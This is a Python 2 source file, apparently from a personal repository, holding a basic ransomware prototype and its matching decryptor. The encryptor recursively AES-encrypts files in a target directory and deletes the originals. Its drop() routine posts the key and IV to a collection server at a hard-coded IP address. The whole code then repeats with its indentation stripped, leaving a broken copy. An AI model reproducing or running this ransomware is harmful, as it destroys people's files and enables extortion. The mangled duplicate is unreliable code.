zmallen/crypto.py

## crypto.py
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
import subprocess as sub
class lolCrypt:
    def __init__(self, key, iv):
        self.key = key
        self.iv = iv
        self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)

    def encrypt_file(self, in_filename, chunksize=64 * 1024):
        out_filename = in_filename + '.lol'
        filesize = os.path.getsize(in_filename)
        with open(in_filename, 'rb') as infile:
            with open(out_filename, 'wb') as outfile:
                outfile.write(struct.pack('<Q', filesize))
                while True:
                    chunk = infile.read(chunksize)
                    if len(chunk) == 0:
                        break
                    elif len(chunk) % 16 != 0:
                        chunk += ' ' * (16 - len(chunk) % 16)
                    outfile.write(self.cryptor.encrypt(chunk))

    def walk(self, target_dir, white_list):
        try:
            for dirname, dirnames, filenames in os.walk(target_dir):
            # print path to all filenames.
                for filename in filenames:
                    try:
                        full_file = os.path.join(dirname, filename)
                        if filename not in white_list:
                            self.encrypt_file(full_file)
                            os.remove(full_file)
                    except:
                        continue
        except:
            pass

    def drop(self):
        conn = httplib.HTTPConnection('192.168.1.86', '7000')
        headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
        params = urllib.urlencode({'key':self.key.encode('hex'), 'iv':self.iv.encode('hex')})
        conn.request('POST', '/submit', params, headers)

def main():
    key = os.urandom(16)
    iv = os.urandom(16)
    aes = lolCrypt(key, iv)

    print 'key: %s\niv: %s' % (key.encode('hex'), iv.encode('hex'))
    if _platform == "linux" or _platform == "linux2":
        # linux
        print 'linux'
        linux_whitelist = ['cat', 'wall', 'echo', 'python', 'ifconfig', 'ls', 'python2.7', 'python2.6', 'bash', 'chmod']
        aes.drop()
        aes.walk("/root/wat", linux_whitelist)

    elif _platform == "darwin":
        # OS X
        print 'darwin'
        osx_whitelist = ["no.no"]
        aes.walk("/Users/techy/git/crypto/wat", osx_whitelist)
    elif _platform == "win32":
        print 'winders'

if __name__  == '__main__':
    main()

###### decrypt ###
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
class lolCrypt:
    def __init__(self, key, iv):
        self.key = key
        self.iv = iv
        self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)
    def decrypt_file(self, in_filename, chunksize=24 * 1024):
        if not in_filename.endswith('.lol'):
            print 'uh ohs, no .lol in filename :D -> %s' % (in_filename)
            return
        out_filename = in_filename[0:-4]
        try:
            with open(in_filename, 'rb') as infile:
                origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
                with open(out_filename, 'wb') as outfile:
                    while True:
                        chunk = infile.read(chunksize)
                        if len(chunk) == 0:
                            break
                        outfile.write(self.cryptor.decrypt(chunk))
                    outfile.truncate(origsize)
            os.remove(in_filename)
        except:
            print 'Error:', sys.exc_info()[0]

    def walk(self, target_dir):
        print 'walkin'
        for dirname, dirnames, filenames in os.walk(target_dir):
        # print path to all filenames.
            for filename in filenames:
                full_file = os.path.join(dirname, filename)
                print 'file %s' % full_file
                self.decrypt_file(full_file)
def main():
    # fill out key and iv from other output here
    key = ''
    iv = ''
    aes = lolCrypt(key.decode('hex'), iv.decode('hex'))
    if _platform == 'linux' or _platform == 'linux2':
        # linux
        print 'linux'
        aes.walk('/wat')
    elif _platform == "darwin":
        # OS X
        print 'darwin'
        aes.walk('/Users/techy/git/crypto/wat')

if __name__  == '__main__':
    main()
	from Crypto.Cipher import AES
	import os, struct, sys, httplib, urllib
	from sys import platform as _platform
	import subprocess as sub
	class lolCrypt:
	def __init__(self, key, iv):
	self.key = key
	self.iv = iv
	self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)

	def encrypt_file(self, in_filename, chunksize=64 * 1024):
	out_filename = in_filename + '.lol'
	filesize = os.path.getsize(in_filename)
	with open(in_filename, 'rb') as infile:
	with open(out_filename, 'wb') as outfile:
	outfile.write(struct.pack('<Q', filesize))
	while True:
	chunk = infile.read(chunksize)
	if len(chunk) == 0:
	break
	elif len(chunk) % 16 != 0:
	chunk += ' ' * (16 - len(chunk) % 16)
	outfile.write(self.cryptor.encrypt(chunk))

	def walk(self, target_dir, white_list):
	try:
	for dirname, dirnames, filenames in os.walk(target_dir):
	# print path to all filenames.
	for filename in filenames:
	try:
	full_file = os.path.join(dirname, filename)
	if filename not in white_list:
	self.encrypt_file(full_file)
	os.remove(full_file)
	except:
	continue
	except:
	pass

	def drop(self):
	conn = httplib.HTTPConnection('192.168.1.86', '7000')
	headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
	params = urllib.urlencode({'key':self.key.encode('hex'), 'iv':self.iv.encode('hex')})
	conn.request('POST', '/submit', params, headers)

	def main():
	key = os.urandom(16)
	iv = os.urandom(16)
	aes = lolCrypt(key, iv)

	print 'key: %s\niv: %s' % (key.encode('hex'), iv.encode('hex'))
	if _platform == "linux" or _platform == "linux2":
	# linux
	print 'linux'
	linux_whitelist = ['cat', 'wall', 'echo', 'python', 'ifconfig', 'ls', 'python2.7', 'python2.6', 'bash', 'chmod']
	aes.drop()
	aes.walk("/root/wat", linux_whitelist)

	elif _platform == "darwin":
	# OS X
	print 'darwin'
	osx_whitelist = ["no.no"]
	aes.walk("/Users/techy/git/crypto/wat", osx_whitelist)
	elif _platform == "win32":
	print 'winders'

	if __name__ == '__main__':
	main()

	###### decrypt ###
	from Crypto.Cipher import AES
	import os, struct, sys, httplib, urllib
	from sys import platform as _platform
	class lolCrypt:
	def __init__(self, key, iv):
	self.key = key
	self.iv = iv
	self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)
	def decrypt_file(self, in_filename, chunksize=24 * 1024):
	if not in_filename.endswith('.lol'):
	print 'uh ohs, no .lol in filename :D -> %s' % (in_filename)
	return
	out_filename = in_filename[0:-4]
	try:
	with open(in_filename, 'rb') as infile:
	origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
	with open(out_filename, 'wb') as outfile:
	while True:
	chunk = infile.read(chunksize)
	if len(chunk) == 0:
	break
	outfile.write(self.cryptor.decrypt(chunk))
	outfile.truncate(origsize)
	os.remove(in_filename)
	except:
	print 'Error:', sys.exc_info()[0]

	def walk(self, target_dir):
	print 'walkin'
	for dirname, dirnames, filenames in os.walk(target_dir):
	# print path to all filenames.
	for filename in filenames:
	full_file = os.path.join(dirname, filename)
	print 'file %s' % full_file
	self.decrypt_file(full_file)
	def main():
	# fill out key and iv from other output here
	key = ''
	iv = ''
	aes = lolCrypt(key.decode('hex'), iv.decode('hex'))
	if _platform == 'linux' or _platform == 'linux2':
	# linux
	print 'linux'
	aes.walk('/wat')
	elif _platform == "darwin":
	# OS X
	print 'darwin'
	aes.walk('/Users/techy/git/crypto/wat')

	if __name__ == '__main__':
	main()